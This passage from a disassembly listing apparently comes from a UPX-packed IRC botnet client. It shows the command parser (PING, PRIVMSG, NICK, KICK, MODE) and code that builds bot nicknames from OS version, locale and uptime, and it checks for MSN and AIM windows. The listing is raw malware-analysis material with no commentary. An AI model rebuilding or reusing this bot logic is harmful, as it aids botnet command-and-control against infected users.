pop ecx
jz loc_404751
push offset aPart ; "PART"
push [ebp+arg_0]
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4046A1
loc_404672: ; CODE XREF: sub_4045CE+E4�j
push [ebp+var_10]
mov ecx, [ebp+var_4]
push [ebp+var_14]
push [ebp+var_18]
call sub_4011DB
test eax, eax
jz loc_404751
push [ebp+var_10]
mov ecx, [ebp+var_4]
push [ebp+var_14]
push [ebp+var_18]
call sub_4011C7
jmp loc_404751
; ---------------------------------------------------------------------------
loc_4046A1: ; CODE XREF: sub_4045CE+A2�j
push offset aQuit_0 ; "QUIT"
push [ebp+arg_0]
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_404672
push offset aNotice ; "NOTICE"
push [ebp+arg_0]
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4046DC
push 20h
push edi
mov [ebp+var_C], edi
call esi ; dword_47B608
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
jz short loc_4046D9
loc_4046D7: ; CODE XREF: sub_4045CE+135�j
mov [edi], bl
loc_4046D9: ; CODE XREF: sub_4045CE+107�j
inc edi
jmp short loc_404751
; ---------------------------------------------------------------------------
loc_4046DC: ; CODE XREF: sub_4045CE+F7�j
push offset aPrivmsg ; "PRIVMSG"
push [ebp+arg_0]
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_404705
push 20h
push edi
mov [ebp+var_C], edi
call esi ; dword_47B608
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
jz loc_4047B7
jmp short loc_4046D7
; ---------------------------------------------------------------------------
loc_404705: ; CODE XREF: sub_4045CE+11F�j
push offset aNick ; "NICK"
push [ebp+arg_0]
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_404751
mov eax, [ebp+var_4]
push dword ptr [eax+8]
push [ebp+var_18]
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_404751
mov esi, [ebp+var_4]
push dword ptr [esi+8]
call sub_40C23A
push edi
call sub_40C28E ; strlen
inc eax
push eax
call sub_40C288
push edi
push eax
mov [esi+8], eax
call sub_40C25E ; strcpy
add esp, 14h
loc_404751: ; CODE XREF: sub_4045CE+8B�j
; sub_4045CE+B7�j ...
lea eax, [ebp+var_18]
push eax
push edi
push [ebp+arg_0]
jmp short loc_4047AF
; ---------------------------------------------------------------------------
loc_40475B: ; CODE XREF: sub_4045CE+17�j
push 20h
push eax
mov edi, eax
call ds:dword_47B608 ; strchr
pop ecx
cmp eax, ebx
pop ecx
jz short loc_4047B7
push offset aPing ; "PING"
push edi
mov [eax], bl
lea esi, [eax+1]
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40479D
cmp esi, ebx
jz short loc_4047B7
mov eax, [ebp+var_4]
inc esi
push esi
push offset aPongS ; "PONG %s\r\n"
push dword ptr [eax]
push eax
call sub_4011C2
add esp, 10h
jmp short loc_4047B7
; ---------------------------------------------------------------------------
loc_40479D: ; CODE XREF: sub_4045CE+1B2�j
lea eax, [ebp+var_18]
mov [ebp+var_10], ebx
push eax
push esi
mov [ebp+var_14], ebx
mov [ebp+var_18], ebx
mov [ebp+var_C], ebx
push edi
loc_4047AF: ; CODE XREF: sub_4045CE+18B�j
mov ecx, [ebp+var_4]
call sub_4012EE
loc_4047B7: ; CODE XREF: sub_4045CE+30�j
; sub_4045CE+12F�j ...
pop edi
pop esi
pop ebx
leave
retn 4
sub_4045CE endp
; ---------------------------------------------------------------------------
db 7Ch dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_40483A proc near ; CODE XREF: sub_4012EE�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, ecx
mov esi, [edi+1Ch]
loc_404841: ; CODE XREF: sub_40483A+1F�j
test esi, esi
jz short loc_40486A
push [esp+8+arg_0]
push dword ptr [esi]
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40485B
mov esi, [esi+8]
jmp short loc_404841
; ---------------------------------------------------------------------------
loc_40485B: ; CODE XREF: sub_40483A+1A�j
push edi
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
call dword ptr [esi+4]
add esp, 0Ch
loc_40486A: ; CODE XREF: sub_40483A+9�j
pop edi
pop esi
retn 0Ch
sub_40483A endp
; ---------------------------------------------------------------------------
db 0Dh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40487C proc near ; CODE XREF: sub_40109B�j
var_204 = byte ptr -204h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 204h
push esi
mov esi, [ebp+arg_0]
cmp byte ptr [esi+4], 0
jnz short loc_404894
push 1
pop eax
jmp short loc_4048D6
; ---------------------------------------------------------------------------
loc_404894: ; CODE XREF: sub_40487C+11�j
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_204]
push [ebp+arg_8]
push 202h
push eax
call ds:dword_47B5D8 ; _vsnprintf
lea eax, [ebp+var_204]
push eax
push [ebp+arg_4]
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
push dword ptr [esi]
push esi
call sub_4011C2
add esp, 24h
mov esi, eax
push 7D0h
call ds:dword_47B4EC ; Sleep
mov eax, esi
loc_4048D6: ; CODE XREF: sub_40487C+16�j
pop esi
leave
retn
sub_40487C endp
; ---------------------------------------------------------------------------
db 17h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4048F0 proc near ; CODE XREF: sub_40104B�j
var_1E8 = byte ptr -1E8h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 1E8h
push esi
mov esi, [ebp+arg_0]
cmp byte ptr [esi+4], 0
jnz short loc_404908
push 1
pop eax
jmp short loc_40494A
; ---------------------------------------------------------------------------
loc_404908: ; CODE XREF: sub_4048F0+11�j
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_1E8]
push [ebp+arg_8]
push 1E6h
push eax
call ds:dword_47B5D8 ; _vsnprintf
lea eax, [ebp+var_1E8]
push eax
push [ebp+arg_4]
push offset aPrivmsgSS ; "PRIVMSG %s :%s\r\n"
push dword ptr [esi]
push esi
call sub_4011C2
add esp, 24h
mov esi, eax
push 7D0h
call ds:dword_47B4EC ; Sleep
mov eax, esi
loc_40494A: ; CODE XREF: sub_4048F0+16�j
pop esi
leave
retn
sub_4048F0 endp
; ---------------------------------------------------------------------------
db 17h dup(0CCh)
; ---------------------------------------------------------------------------
loc_404964: ; CODE XREF: UPX0:004011D1�j
push ebp
mov ebp, esp
sub esp, 1E8h
push esi
push edi
mov edi, [ebp+8]
cmp byte ptr [edi+4], 0
jz short loc_4049BD
lea eax, [ebp+18h]
push eax
lea eax, [ebp-1E8h]
push dword ptr [ebp+14h]
push 1E6h
push eax
call ds:dword_47B5D8 ; _vsnprintf
add esp, 10h
cmp dword ptr [ebp+10h], 0
jz short loc_4049C2
mov esi, ds:dword_47B5C8
lea eax, [ebp-1E8h]
push eax
call esi ; dword_47B5C8
pop ecx
push eax
push dword ptr [ebp+10h]
call esi ; dword_47B5C8
pop ecx
push eax
call sub_4010D2
pop ecx
test eax, eax
pop ecx
jnz short loc_4049C2
loc_4049BD: ; CODE XREF: UPX0:00404976�j
push 1
pop eax
jmp short loc_4049EB
; ---------------------------------------------------------------------------
loc_4049C2: ; CODE XREF: UPX0:00404998�j
; UPX0:004049BB�j
lea eax, [ebp-1E8h]
push eax
push dword ptr [ebp+0Ch]
push offset aPrivmsgSS ; "PRIVMSG %s :%s\r\n"
push dword ptr [edi]
push edi
call sub_4011C2
add esp, 14h
mov esi, eax
push 7D0h
call ds:dword_47B4EC ; Sleep
mov eax, esi
loc_4049EB: ; CODE XREF: UPX0:004049C0�j
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
db 22h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_404A11 proc near ; CODE XREF: sub_40124E�j
arg_0 = dword ptr 4
cmp byte ptr [ecx+4], 0
jnz short loc_404A1C
push 1
pop eax
jmp short locret_404A30
; ---------------------------------------------------------------------------
loc_404A1C: ; CODE XREF: sub_404A11+4�j
push [esp+arg_0]
push offset aJoinS ; "JOIN %s\r\n"
push dword ptr [ecx]
push ecx
call sub_4011C2
add esp, 10h
locret_404A30: ; CODE XREF: sub_404A11+9�j
retn 4
sub_404A11 endp
; ---------------------------------------------------------------------------
db 8 dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_404A3B proc near ; CODE XREF: sub_4010FA�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp byte ptr [ecx+4], 0
jnz short loc_404A46
push 1
pop eax
jmp short locret_404A5E
; ---------------------------------------------------------------------------
loc_404A46: ; CODE XREF: sub_404A3B+4�j
push [esp+arg_4]
push [esp+4+arg_0]
push offset aJoinSS ; "JOIN %s %s\r\n"
push dword ptr [ecx]
push ecx
call sub_4011C2
add esp, 14h
locret_404A5E: ; CODE XREF: sub_404A3B+9�j
retn 8
sub_404A3B endp
; ---------------------------------------------------------------------------
db 9 dup(0CCh)
; ---------------------------------------------------------------------------
loc_404A6A: ; CODE XREF: UPX0:004011A4�j
cmp byte ptr [ecx+4], 0
jnz short loc_404A75
push 1
pop eax
jmp short locret_404A89
; ---------------------------------------------------------------------------
loc_404A75: ; CODE XREF: UPX0:00404A6E�j
push dword ptr [esp+4]
push offset aPartS ; "PART %s\r\n"
push dword ptr [ecx]
push ecx
call sub_4011C2
add esp, 10h
locret_404A89: ; CODE XREF: UPX0:00404A73�j
retn 4
; ---------------------------------------------------------------------------
db 8 dup(0CCh)
; ---------------------------------------------------------------------------
loc_404A94: ; CODE XREF: UPX0:00401203�j
cmp byte ptr [ecx+4], 0
jnz short loc_404A9F
push 1
pop eax
jmp short locret_404AB7
; ---------------------------------------------------------------------------
loc_404A9F: ; CODE XREF: UPX0:00404A98�j
push dword ptr [esp+8]
push dword ptr [esp+8]
push offset aKickSS ; "KICK %s %s\r\n"
push dword ptr [ecx]
push ecx
call sub_4011C2
add esp, 14h
locret_404AB7: ; CODE XREF: UPX0:00404A9D�j
retn 8
; ---------------------------------------------------------------------------
db 9 dup(0CCh)
; ---------------------------------------------------------------------------
loc_404AC3: ; CODE XREF: UPX0:00401078�j
cmp byte ptr [ecx+4], 0
jnz short loc_404ACE
push 1
pop eax
jmp short locret_404AE2
; ---------------------------------------------------------------------------
loc_404ACE: ; CODE XREF: UPX0:00404AC7�j
push dword ptr [esp+4]
push offset aS_3 ; "%s\r\n"
push dword ptr [ecx]
push ecx
call sub_4011C2
add esp, 10h
locret_404AE2: ; CODE XREF: UPX0:00404ACC�j
retn 4
; ---------------------------------------------------------------------------
db 8 dup(0CCh)
; ---------------------------------------------------------------------------
loc_404AED: ; CODE XREF: UPX0:00401087�j
cmp byte ptr [ecx+4], 0
jnz short loc_404AF8
push 1
pop eax
jmp short locret_404B14
; ---------------------------------------------------------------------------
loc_404AF8: ; CODE XREF: UPX0:00404AF1�j
push dword ptr [esp+0Ch]
push dword ptr [esp+0Ch]
push dword ptr [esp+0Ch]
push offset aKickSSS ; "KICK %s %s :%s\r\n"
push dword ptr [ecx]
push ecx
call sub_4011C2
add esp, 18h
locret_404B14: ; CODE XREF: UPX0:00404AF6�j
retn 0Ch
; ---------------------------------------------------------------------------
db 0Ah dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404B21 proc near ; CODE XREF: sub_401267�j
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp byte ptr [ecx+4], 0
jnz short loc_404B2F
push 1
pop eax
jmp short loc_404B66
; ---------------------------------------------------------------------------
loc_404B2F: ; CODE XREF: sub_404B21+7�j
cmp [ebp+arg_8], 0
jnz short loc_404B4D
push [ebp+arg_4]
push [ebp+arg_0]
push offset aModeSS ; "MODE %s %s\r\n"
push dword ptr [ecx]
push ecx
call sub_4011C2
add esp, 14h
jmp short loc_404B66
; ---------------------------------------------------------------------------
loc_404B4D: ; CODE XREF: sub_404B21+12�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push offset aModeSSS ; "MODE %s %s %s\r\n"
push dword ptr [ecx]
push ecx
call sub_4011C2
add esp, 18h
loc_404B66: ; CODE XREF: sub_404B21+C�j
; sub_404B21+2A�j
pop ebp
retn 0Ch
sub_404B21 endp
; ---------------------------------------------------------------------------
db 12h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_404B7C proc near ; CODE XREF: sub_4011B8�j
arg_0 = dword ptr 4
cmp byte ptr [ecx+4], 0
jnz short loc_404B87
push 1
pop eax
jmp short locret_404B97
; ---------------------------------------------------------------------------
loc_404B87: ; CODE XREF: sub_404B7C+4�j
push 0
push [esp+4+arg_0]
push dword ptr [ecx+8]
call sub_401267
xor eax, eax
locret_404B97: ; CODE XREF: sub_404B7C+9�j
retn 4
sub_404B7C endp
; ---------------------------------------------------------------------------
db 7 dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_404BA1 proc near ; CODE XREF: sub_40129E�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov [ecx+20h], eax
mov eax, [esp+arg_0]
test eax, eax
jnz short loc_404BB7
call sub_401190
jmp short loc_404BF1
; ---------------------------------------------------------------------------
loc_404BB7: ; CODE XREF: sub_404BA1+D�j
cmp eax, 2
jnz short loc_404BC3
call sub_401159
jmp short loc_404BF1
; ---------------------------------------------------------------------------
loc_404BC3: ; CODE XREF: sub_404BA1+19�j
cmp eax, 3
jnz short loc_404BCF
call sub_40118B
jmp short loc_404BF1
; ---------------------------------------------------------------------------
loc_404BCF: ; CODE XREF: sub_404BA1+25�j
cmp eax, 4
jnz short loc_404BDB
call sub_401208
jmp short loc_404BF1
; ---------------------------------------------------------------------------
loc_404BDB: ; CODE XREF: sub_404BA1+31�j
cmp eax, 1
jz short loc_404BEC
cmp eax, 5
jnz short loc_404BEC
call sub_40108C
jmp short loc_404BF1
; ---------------------------------------------------------------------------
loc_404BEC: ; CODE XREF: sub_404BA1+3D�j
; sub_404BA1+42�j
call sub_40117C
loc_404BF1: ; CODE XREF: sub_404BA1+14�j
; sub_404BA1+20�j ...
mov dword_4139D8, eax
retn 8
sub_404BA1 endp
; ---------------------------------------------------------------------------
db 16h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_404C0F proc near ; CODE XREF: sub_40117C�j
push ebx
push esi
push edi
push 12h
mov ebx, offset byte_4139F0
push 0
mov edi, ecx
push ebx
call sub_40C294 ; memset
xor esi, esi
add esp, 0Ch
cmp [edi+20h], esi
jl short loc_404C48
loc_404C2D: ; CODE XREF: sub_404C0F+37�j
call ds:dword_47B5EC ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov byte_4139F0[esi], dl
inc esi
cmp esi, [edi+20h]
jle short loc_404C2D
loc_404C48: ; CODE XREF: sub_404C0F+1C�j
and byte_4139F0[esi], 0
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_404C0F endp
; ---------------------------------------------------------------------------
db 11h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404C66 proc near ; CODE XREF: sub_40118B�j
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push 12h
mov esi, offset byte_413A04
push ebx
push esi
call sub_40C294 ; memset
add esp, 0Ch
lea eax, [ebp+var_4]
mov [ebp+var_4], 12h
push eax
push esi
call dword_413EFC ; GetComputerNameA
movsx eax, byte_413A04
push 41h
pop ecx
loc_404C9B: ; CODE XREF: sub_404C66+40�j
cmp eax, ecx
jnz short loc_404CA2
push 1
pop ebx
loc_404CA2: ; CODE XREF: sub_404C66+37�j
inc ecx
cmp ecx, 5Bh
jl short loc_404C9B
push 61h
pop ecx
loc_404CAB: ; CODE XREF: sub_404C66+50�j
cmp eax, ecx
jnz short loc_404CB2
push 1
pop ebx
loc_404CB2: ; CODE XREF: sub_404C66+47�j
inc ecx
cmp ecx, 7Bh
jl short loc_404CAB
test ebx, ebx
jnz short loc_404CCA
push offset aError ; "Error"
push esi
call ds:dword_47B5FC ; sprintf
pop ecx
pop ecx
loc_404CCA: ; CODE XREF: sub_404C66+54�j
mov eax, esi
pop esi
pop ebx
leave
retn
sub_404C66 endp
; ---------------------------------------------------------------------------
db 1Ah dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404CEA proc near ; CODE XREF: sub_401159�j
var_14 = byte ptr -14h
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
push 12h
mov esi, offset byte_4139DC
push 0
mov ebx, ecx
push esi
call sub_40C294 ; memset
add esp, 0Ch
lea eax, [ebp+var_14]
push 12h
push eax
push 7
push 800h
call ds:dword_47B4A8 ; GetLocaleInfoA
lea eax, [ebp+var_14]
push eax
push offset aS ; "%s-"
push esi
call ds:dword_47B5FC ; sprintf
push esi
call sub_40C28E ; strlen
add esp, 10h
mov edi, eax
loc_404D35: ; CODE XREF: sub_404CEA+66�j
cmp edi, [ebx+20h]
jg short loc_404D52
call ds:dword_47B5EC ; rand
push 0Ah
cdq
pop ecx
idiv ecx
add dl, 30h
mov byte_4139DC[edi], dl
inc edi
jmp short loc_404D35
; ---------------------------------------------------------------------------
loc_404D52: ; CODE XREF: sub_404CEA+4E�j
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_404CEA endp
; ---------------------------------------------------------------------------
db 1Bh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D74 proc near ; CODE XREF: sub_401190�j
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_88 = dword ptr -88h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 98h
push ebx
push esi
push edi
xor esi, esi
push 12h
mov edi, offset byte_413988
push esi
mov ebx, ecx
push edi
call sub_40C294 ; memset
add esp, 0Ch
lea eax, [ebp+var_98]
mov [ebp+var_98], 94h
push eax
call ds:dword_47B51C ; GetVersionExA
test eax, eax
jz loc_404E3C
cmp [ebp+var_94], 4
jnz short loc_404E06
cmp [ebp+var_90], esi
jnz short loc_404DE6
cmp [ebp+var_88], 1
mov eax, offset a95 ; "95-"
jz short loc_404DD6
mov eax, [ebp+var_4]
loc_404DD6: ; CODE XREF: sub_404D74+5D�j
cmp [ebp+var_88], 2
jnz short loc_404E41
mov eax, offset aNt ; "NT-"
jmp short loc_404E41
; ---------------------------------------------------------------------------
loc_404DE6: ; CODE XREF: sub_404D74+4F�j
cmp [ebp+var_90], 0Ah
jnz short loc_404DF6
mov eax, offset a98 ; "98-"
jmp short loc_404E41
; ---------------------------------------------------------------------------
loc_404DF6: ; CODE XREF: sub_404D74+79�j
cmp [ebp+var_90], 5Ah
jnz short loc_404E3C
mov eax, offset aMe ; "ME-"
jmp short loc_404E41
; ---------------------------------------------------------------------------
loc_404E06: ; CODE XREF: sub_404D74+47�j
cmp [ebp+var_94], 5
jnz short loc_404E3C
cmp [ebp+var_90], esi
jnz short loc_404E1E
mov eax, offset a2k ; "2K-"
jmp short loc_404E41
; ---------------------------------------------------------------------------
loc_404E1E: ; CODE XREF: sub_404D74+A1�j
cmp [ebp+var_90], 1
jnz short loc_404E2E
mov eax, offset aXp ; "XP-"
jmp short loc_404E41
; ---------------------------------------------------------------------------
loc_404E2E: ; CODE XREF: sub_404D74+B1�j
cmp [ebp+var_90], 2
mov eax, offset a2k3 ; "2K3-"
jz short loc_404E41
loc_404E3C: ; CODE XREF: sub_404D74+3A�j
; sub_404D74+89�j ...
mov eax, offset aWin ; "WIN-"
loc_404E41: ; CODE XREF: sub_404D74+69�j
; sub_404D74+70�j ...
push eax
push edi
call ds:dword_47B5FC ; sprintf
push edi
call sub_40C28E ; strlen
add esp, 0Ch
mov esi, eax
loc_404E54: ; CODE XREF: sub_404D74+FB�j
cmp esi, [ebx+20h]
jg short loc_404E71
call ds:dword_47B5EC ; rand
push 0Ah
cdq
pop ecx
idiv ecx
add dl, 30h
mov byte_413988[esi], dl
inc esi
jmp short loc_404E54
; ---------------------------------------------------------------------------
loc_404E71: ; CODE XREF: sub_404D74+E3�j
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_404D74 endp
; ---------------------------------------------------------------------------
db 41h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404EB9 proc near ; CODE XREF: sub_401208�j
var_A0 = dword ptr -0A0h
var_9C = byte ptr -9Ch
var_C = word ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0A0h
push ebx
push esi
push edi
push 12h
mov ebx, offset dword_4139B0
push 0
mov [ebp+var_4], ecx
push ebx
call sub_40C294 ; memset
push 12h
mov esi, offset byte_41399C
push 0
push esi
call sub_40C294 ; memset
add esp, 18h
xor eax, eax
lea edi, [ebp+var_9C]
push 26h
pop ecx
rep stosd
lea eax, [ebp+var_A0]
mov [ebp+var_A0], 9Ch
push eax
call ds:dword_47B51C ; GetVersionExA
test eax, eax
jz short loc_404F55
movzx eax, [ebp+var_C]
mov edi, ds:dword_47B5FC
push eax
push offset aSpI ; "SP%i-"
push ebx
call edi ; dword_47B5FC
push ebx
push esi
call edi ; dword_47B5FC
push esi
call sub_40C28E ; strlen
mov ebx, [ebp+var_4]
add esp, 18h
mov edi, eax
loc_404F36: ; CODE XREF: sub_404EB9+98�j
cmp edi, [ebx+20h]
jg short loc_404F53
call ds:dword_47B5EC ; rand
push 0Ah
cdq
pop ecx
idiv ecx
add dl, 30h
mov byte_41399C[edi], dl
inc edi
jmp short loc_404F36
; ---------------------------------------------------------------------------
loc_404F53: ; CODE XREF: sub_404EB9+80�j
mov eax, esi
loc_404F55: ; CODE XREF: sub_404EB9+56�j
pop edi
pop esi
pop ebx
leave
retn
sub_404EB9 endp
; ---------------------------------------------------------------------------
db 28h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F82 proc near ; CODE XREF: sub_40108C�j
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A4 = dword ptr -0A4h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0B4h
push ebx
push esi
push edi
xor ebx, ebx
push 12h
mov esi, offset dword_4139C4
push ebx
mov edi, ecx
push esi
call sub_40C294 ; memset
add esp, 0Ch
mov ecx, edi
mov [edi+28h], ebx
mov [edi+2Ch], ebx
mov [edi+30h], ebx
mov [edi+34h], ebx
call sub_40123F
mov [ebp+var_C], eax
lea eax, [ebp+var_B4]
push eax
mov [ebp+var_B4], 94h
call ds:dword_47B51C ; GetVersionExA
test eax, eax
jz loc_40506B
cmp [ebp+var_B0], 4
jnz short loc_40502F
cmp [ebp+var_AC], ebx
jnz short loc_40500B
cmp [ebp+var_A4], 1
jnz short loc_404FF9
mov [ebp+var_4], offset a95_0 ; "95"
loc_404FF9: ; CODE XREF: sub_404F82+6E�j
cmp [ebp+var_A4], 2
jnz short loc_405072
mov [ebp+var_4], offset aNt_0 ; "NT"
jmp short loc_405072
; ---------------------------------------------------------------------------
loc_40500B: ; CODE XREF: sub_404F82+65�j
cmp [ebp+var_AC], 0Ah
jnz short loc_40501D
mov [ebp+var_4], offset a98_0 ; "98"
jmp short loc_405072
; ---------------------------------------------------------------------------
loc_40501D: ; CODE XREF: sub_404F82+90�j
cmp [ebp+var_AC], 5Ah
jnz short loc_40506B
mov [ebp+var_4], offset aMe_0 ; "ME"
jmp short loc_405072
; ---------------------------------------------------------------------------
loc_40502F: ; CODE XREF: sub_404F82+5D�j
cmp [ebp+var_B0], 5
jnz short loc_40506B
cmp [ebp+var_AC], ebx
jnz short loc_405049
mov [ebp+var_4], offset a2k_0 ; "2K"
jmp short loc_405072
; ---------------------------------------------------------------------------
loc_405049: ; CODE XREF: sub_404F82+BC�j
cmp [ebp+var_AC], 1
jnz short loc_40505B
mov [ebp+var_4], offset aXp_0 ; "XP"
jmp short loc_405072
; ---------------------------------------------------------------------------
loc_40505B: ; CODE XREF: sub_404F82+CE�j
cmp [ebp+var_AC], 2
mov [ebp+var_4], offset a2k3_0 ; "2K3"
jz short loc_405072
loc_40506B: ; CODE XREF: sub_404F82+50�j
; sub_404F82+A2�j ...
mov [ebp+var_4], offset aWin_0 ; "WIN"
loc_405072: ; CODE XREF: sub_404F82+7E�j
; sub_404F82+87�j ...
lea eax, [ebp+var_20]
push 12h
push eax
push 7
push 800h
call ds:dword_47B4A8 ; GetLocaleInfoA
push [ebp+var_C]
push esi
call sub_40C29A ; strcat
lea eax, [ebp+var_20]
push eax
push esi
call sub_40C29A ; strcat
mov ebx, offset asc_4105F0 ; "|"
push ebx
push esi
call sub_40C29A ; strcat
push [ebp+var_4]
push esi
call sub_40C29A ; strcat
push ebx
push esi
call sub_40C29A ; strcat
add esp, 28h
xor ecx, ecx
cmp [edi+28h], ecx
push 1
pop eax
jz short loc_4050C4
push 2
pop eax
loc_4050C4: ; CODE XREF: sub_404F82+13D�j
cmp [edi+2Ch], ecx
jz short loc_4050CA
inc eax
loc_4050CA: ; CODE XREF: sub_404F82+145�j
cmp [edi+30h], ecx
jz short loc_4050D0
inc eax
loc_4050D0: ; CODE XREF: sub_404F82+14B�j
cmp [edi+34h], ecx
jz short loc_4050D6
inc eax
loc_4050D6: ; CODE XREF: sub_404F82+151�j
push 7
pop edi
cmp eax, edi
jge short loc_40510B
sub edi, eax
loc_4050DF: ; CODE XREF: sub_404F82+187�j
call ds:dword_47B5EC ; rand
push 0Ah
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_6]
push edx
push offset aI ; "%i"
push eax
call ds:dword_47B5FC ; sprintf
lea eax, [ebp+var_6]
push eax
push esi
call sub_40C29A ; strcat
add esp, 14h
dec edi
jnz short loc_4050DF
loc_40510B: ; CODE XREF: sub_404F82+159�j
push offset asc_4105E8 ; "]"
push esi
call sub_40C29A ; strcat
pop ecx
mov eax, esi
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_404F82 endp
; ---------------------------------------------------------------------------
db 67h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405186 proc near ; CODE XREF: sub_40123F�j
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 24h
push ebx
push esi
push edi
xor ebx, ebx
push 12h
mov esi, offset dword_413A1C
push ebx
mov edi, ecx
push esi
call sub_40C294 ; memset
add esp, 0Ch
lea eax, [ebp+var_1C]
push eax
call dword_413D80 ; QueryPerformanceCounter
test eax, eax
jz loc_405292
lea eax, [ebp+var_14]
push eax
call dword_413D5C ; QueryPerformanceFrequency
test eax, eax
jz loc_405292
push [ebp+var_10]
push [ebp+var_14]
push [ebp+var_18]
push [ebp+var_1C]
call sub_40C310
push ebx
push 15180h
push edx
push eax
call sub_40C310
push offset asc_41065C ; "["
push esi
mov [ebp+var_C], eax
mov [ebp+var_8], edx
call ds:dword_47B5FC ; sprintf
pop ecx
pop ecx
push ebx
push offset aMsnhiddenwindo ; "MSNHiddenWindowClass"
call dword_413EA8 ; FindWindowA
push 1
test eax, eax
pop ebx
jz short loc_405229
push offset aM ; "M"
push esi
mov [edi+28h], ebx
call sub_40C29A ; strcat
push offset asc_4105F0 ; "|"
push esi
call sub_40C29A ; strcat
add esp, 10h
loc_405229: ; CODE XREF: sub_405186+85�j
push 0
push offset aAim_csignonwnd ; "AIM_CSignOnWnd"
call dword_413EA8 ; FindWindowA
test eax, eax
jz short loc_40524A
push offset aA ; "A"
push esi
mov [edi+30h], ebx
call sub_40C29A ; strcat
pop ecx
pop ecx
loc_40524A: ; CODE XREF: sub_405186+B2�j
xor eax, eax
cmp dword_413FBC, eax
jnz short loc_405276
push eax
push eax
push eax
lea eax, [ebp+var_4]
push eax
call dword_413D18 ; InternetGetConnectedStateExA
test [ebp+var_4], bl
jz short loc_405276
push offset aD ; "D"
push esi
call sub_40C29A ; strcat
pop ecx
mov [edi+34h], ebx
pop ecx
loc_405276: ; CODE XREF: sub_405186+CC�j
; sub_405186+DE�j
push [ebp+var_8]
mov ebx, [ebp+var_C]
lea eax, [ebp+var_24]
push ebx
push offset a_2i64u ; "%.2I64u"
push eax
call ds:dword_47B5FC ; sprintf
add esp, 10h
mov [edi+24h], ebx
loc_405292: ; CODE XREF: sub_405186+2A�j
; sub_405186+3C�j
lea eax, [ebp+var_24]
push eax
push esi
call sub_40C29A ; strcat
push offset asc_4105F0 ; "|"
push esi
call sub_40C29A ; strcat
add esp, 10h
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_405186 endp
; ---------------------------------------------------------------------------
db 4Ah dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_4052FB proc near ; CODE XREF: sub_401195�j
arg_0 = dword ptr 4
cmp byte ptr [ecx+4], 0
jnz short loc_405306
push 1
pop eax
jmp short locret_40531A
; ---------------------------------------------------------------------------
loc_405306: ; CODE XREF: sub_4052FB+4�j
push [esp+arg_0]
push offset aNickS ; "NICK %s\r\n"
push dword ptr [ecx]
push ecx
call sub_4011C2
